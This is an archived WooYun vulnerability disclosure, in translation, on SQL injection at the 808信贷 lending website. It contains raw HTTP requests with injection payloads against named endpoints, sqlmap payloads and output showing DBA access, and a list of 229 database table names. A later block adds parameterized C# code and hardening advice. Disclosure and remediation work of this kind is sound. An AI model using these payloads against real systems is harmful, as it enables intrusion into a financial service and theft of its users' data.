
Vulnerability summary

Defect ID: wooyun-2015-0110793

Title: SQL injection on the 808信贷 main site leaks a large amount of data

Vendor: 808信贷

Author: 路人甲

Submitted: 2015-04-28 10:14

Fix time: 2015-06-12 10:16

Published: 2015-06-12 10:16

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-28: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public
2015-06-12: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

233

Detailed description:

Reference: http://wooyun.org/bugs/wooyun-2015-0110567
1.
POST /handle/getHelpContent.ashx HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.js808.cn/
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
id=20%20AND%203*2*1%3d6%20AND%20244%3d244
2.
POST /newSite/Other/User_unlock.aspx HTTP/1.1
Content-Length: 1694
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnEmail=%e7%a1%ae%e8%ae%a4%e6%8f%90%e4%ba%a4&ddlTypeOne=email&ddlTypeTwo=email&txtCode=94102&txtLockNickname='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(79)%2bCHAR(117)%2bCHAR(105)%2bCHAR(105)%2bCHAR(105)%2bCHAR(82)%2bCHAR(114)%2bCHAR(110))%20FROM%20syscolumns)%2b'&txtonestr=1&txttwostr=1&__VIEWSTATE=/wEPDwUINDA3OTc4NTYPZBYCAgEPZBYEAgEPZBYCAgEPDxYCHgRUZXh0Bc4BIOasoui/juadpeWIsDgwOOe9kee7nOS/oei0t%2bW5s%2bWPsOOAgiZuYnNwOyZuYnNwO1s8YSBocmVmPSdodHRwOi8vd3d3LmpzODA4LmNuL25ld1NpdGUvT3RoZXIvbG9naW5fbmV3LmFzcHgnPueZu%2bW9lTwvYT5dJm5ic3A7WzxhIGhyZWY9J2h0dHA6Ly93d3cuanM4MDguY24vbmV3U2l0ZS9PdGhlci9yZWdpc3Rlcl9OZXcuYXNweCc%2b5YWN6LS55rOo5YaMPC9hPl1kZAITD2QWAgIBDxYCHglpbm5lcmh0bWwFzAU8bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzODI3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/kuL08L2xpPjxsaT48YSBocmVmPScjJz48aW1nIGJvcmRlcj0nMCcgc3JjPScvaW1hZ2VzL2J1dHRvbl9vbGRfNDAuZ2lmJyBhbHQ9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBrycgdGl0bGU9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBryc%2bJm5ic3A7MTMzODcxODA4PC9hPiZuYnNwOyZuYnNwOzgwOOmYv%2bmbhTwvbGk%2bPGxpPjxhIGhyZWY9JyMnPjxpbWcgYm9yZGVyPScwJyBzcmM9Jy9pbWFnZXMvYnV0dG9uX29sZF80MC5naWYnIGFsdD0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJyB0aXRsZT0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJz4mbmJzcDsxMzgwNzU4MDg8L2E%2bJm5ic3A7Jm5ic3A7ODA46Zi/6ZyePC9saT48bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzMDk3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/oirM8L2xpPmRk
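Both requests above target SQL that the application evidently builds from raw input: the first appends a boolean condition to the integer `id` of getHelpContent.ashx, the second closes a quoted string in `txtLockNickname` and uses CONVERT(int, ...) on a value read from syscolumns so that SQL Server's conversion error carries data back in the response. The handler below is an added example written for this report, not code from the 808信贷 site or from the report's author; it shows the hardened form for an ASP.NET / SQL Server stack like the one sqlmap fingerprinted. The class name, the "Main" connection-string name, and the column names on the HelpCenterNews and LockUsers tables (the table names themselves appear in the sqlmap listing) are assumptions made for illustration.

```csharp
// Added example (not the vendor's code). Assumed names: GetHelpContentHandler,
// connection string "Main", columns HelpCenterNews(Id, Content) and LockUsers(Nickname).
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public class GetHelpContentHandler : IHttpHandler
{
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["Main"].ConnectionString;

    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        // The vulnerable pattern the first request exploits looks like this:
        //   string sql = "SELECT Content FROM HelpCenterNews WHERE Id=" + context.Request["id"];
        // Whatever follows the number ("20 AND 3*2*1=6 AND 244=244") is executed as SQL.

        // 1. Enforce the type before the value gets anywhere near SQL.
        int id;
        if (!int.TryParse(context.Request.Form["id"], out id) || id <= 0)
        {
            context.Response.StatusCode = 400;
            return;
        }

        // 2. Bind the value as a typed parameter; it is sent as data, never as statement text.
        const string sql = "SELECT Content FROM HelpCenterNews WHERE Id = @id";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            object content = cmd.ExecuteScalar();
            context.Response.ContentType = "text/plain";
            context.Response.Write(content == null ? "" : content.ToString());
        }
    }

    // The second request breaks out of a quoted string with '+(select ...)+'.
    // With a length-bounded NVARCHAR parameter the quote is just a character in the value.
    public static bool IsNicknameLocked(string nickname)
    {
        if (string.IsNullOrEmpty(nickname) || nickname.Length > 50)
            return false;

        const string sql = "SELECT COUNT(*) FROM LockUsers WHERE Nickname = @nick";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@nick", SqlDbType.NVarChar, 50).Value = nickname;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Two further points follow directly from the proof section. The sqlmap output reports `current user is DBA: True`, so the application's connection string uses a login with far more rights than a help-centre lookup needs; the login in "Main" should be restricted to SELECT/EXECUTE on the objects the site actually uses, which bounds the damage even if another injection is missed. The error-based payloads (CONVERT(INT, ...) on a string) only leak data when the raw SQL Server error reaches the client, so `<customErrors mode="On">` in web.config, with errors logged server-side, removes that channel.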

Proof of vulnerability:

---
Parameter: id (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (2692=2692) THEN 2692 ELSE 2692*(SELECT 2692 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 4707=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4707=4707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3982=3982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=1;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(78)+CHAR(86)+CHAR(79)+CHAR(102)+CHAR(65)+CHAR(89)+CHAR(115)+CHAR(122)+CHAR(108)+CHAR(97)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113),NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA: True
available databases [6]:
[*] 808_mdbs
[*] master
[*] model
[*] msdb
[*] temp808
[*] tempdb
Database: 808_mdbs
[229 tables]
+----------------------+
| Admin_Sign |
| Admin_User_808 |
| Admin_iplists |
| Android_LoginUser |
| Answer_808 |
| BBS_father |
| BBS_repays |
| BBS_son |
| BBS_tie |
| Bank_infor |
| Block_kf |
| CftWith |
| City_8088 |
| City_8088 |
| CreditEdu |
| CreditLevel |
| CreditSorce_808 |
| CustomerAssess |
| CustomerService |
| DataCensus_TzQj |
| EduApplay_808 |
| Edu_Tb_808 |
| EmailValide |
| Freezingzj |
| Friend_hei |
| Friends_808 |
| FundsInfos |
| Funds_balance |
| GiftsDhlist |
| HelpCenterNews |
| HelpClass |
| Invitefriends |
| IpInfors |
| JkEText |
| Jl_tj |
| Job_Tb_808 |
| LimitSendEmail |
| LimitSendEmail |
| Link_Tb_808 |
| LoanInfos_operate |
| LoanInfos_operate |
| LoanQsmd |
| Loan_Review |
| Loaninfos_userinfos |
| LockUsers |
| Lotter_state |
| MailContents |
| Monitor_Tb |
| OthersiteLoan |
| PastApplay |
| PastEdu |
| Pro_dhPack |
| Product_ScoreDh |
| Product_duInfos |
| Qustion_808 |
| ReceiveLoan |
| Reg_Arrt |
| Repaymentloan |
| SendCollection |
| SiteInfor |
| SiteMail |
| SiteUser_dstj |
| SubmitRepayment |
| SystemFather |
| SystemSon |
| TB_Dyzliao |
| TB_Kdbaoedu |
| TB_Txjietu |
| TB_adm_ywlr |
| TB_secpwd |
| Table_kbao |
| Tb_Managelist |
| Tb_Notice |
| Tb_Suggest |
| Tb_dfusers |
| Tb_otherhmd |
| TempSecid |
| TenderInfos |
| Tender_db |
| TestMess1 |
| TestMess1 |
| Tgnc_table |
| TrackKf |
| Upload_System |
| UserEmailActivate |
| UserLogin_error |
| UserRegister_Actions |
| UserSafety |
| UserScoreDetails |
| UserScore_DhTx |
| UserScore_DhTx |
| UserSendMailInfo |
| UserTbMoneyTj |
| User_Lottery |
| User_TruntableReward |
| User_UnLockInfos |
| User_WriteOff |
| User_aqNotice |
| User_loanIntr |
| Users_upload |
| VW_Yqhmd2 |
| VW_Yqhmd2 |
| VW_ZliaoP |
| VW_dbr |
| VW_suggest |
| Vip_Users_808 |
| Vw_Bbsties |
| Vw_Cftwith |
| Vw_Fkrsjsq |
| Vw_Freezes |
| Vw_Friends |
| Vw_Fundsinfors |
| Vw_IpList |
| Vw_L_Review |
| Vw_Lendmx |
| Vw_LoanInfoShenHe |
| Vw_Loaninformations |
| Vw_LotterState |
| Vw_MailContent |
| Vw_ManageUsers |
| Vw_Monitor |
| Vw_PeduApplay |
| Vw_ProPackInfosList |
| Vw_ProPackList |
| Vw_ProductDhInfo |
| Vw_ProductList |
| Vw_Receives |
| Vw_Remind_users |
| Vw_Repayment |
| Vw_SiteEmails |
| Vw_Tgusers |
| Vw_TieComment |
| Vw_Trender |
| Vw_UserLotter |
| Vw_UserWithDrawList |
| Vw_Valide |
| Vw_VipInfos |
| Vw_admiplist |
| Vw_bbsBlock |
| Vw_belowCz |
| Vw_cs_users |
| Vw_dbeduapplay |
| Vw_edhistory |
| Vw_eduapplay |
| Vw_eduapplay |
| Vw_hk2days |
| Vw_hlists |
| Vw_inforsnews |
| Vw_lockuserLists |
| Vw_remindlist |
| Vw_shzt |
| Vw_tgtc |
| Vw_txusers |
| Vw_user_zc |
| Vw_userje |
| Vw_users |
| Vw_webinfor |
| Vw_withdraws |
| Vw_wztjian_Tb |
| Vw_xcyw |
| Vw_yq_users |
| Vw_yqusers |
| WithDraw_list |
| admin_tb_808 |
| applyloan |
| bank_setqx |
| bbstie_comment |
| begsh_tb |
| below_recharge |
| bjin_vip_vw |
| bjin_vip_vw |
| black |
| comd_list |
| cspimg_808 |
| db_ed_808 |
| db_jktb_808 |
| dbeduapplay |
| dbr_tb |
| dya_table |
| ed_history |
| fkrsjrz |
| fksmrz_tb |
| giftslist |
| gzr_list |
| hid_id_tb |
| jkcls_808 |
| kserver_Tb808 |
| onlineorder |
| pinsorce_808 |
| pro_packinfos |
| provinces_808 |
| pshhe_result |
| second_tb |
| self_table |
| spplun_intrs |
| sysdiagrams |
| temp_allscore |
| temp_allscore |
| test_808 |
| tgtc_tb808 |
| userinfos_808 |
| vw_Bbsreplays |
| vw_Tenderdbmx |
| vw_Tenderdbmx |
| vw_answers |
| vw_bankinfo |
| vw_bankqxuser |
| vw_csusers |
| vw_dbjklist |
| vw_diya |
| vw_edus |
| vw_etextlist |
| vw_fksmrz |
| vw_hei_friend |
| vw_jkcns |
| vw_jksmrz |
| vw_jobs |
| vw_onorders |
| vw_question |
| vw_selftb |
| vw_txhk2tian |
| vw_txremind |
| vw_upphotos |
| vw_userwriteoff |
| vw_wbnotices |
| vw_yqlist |
| wztjian_Tb |
| xc_repaymment |
| xc_tjr |
+----------------------+

Remediation:

~~~

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined

Vulnerability Rank: 15 (WooYun rating)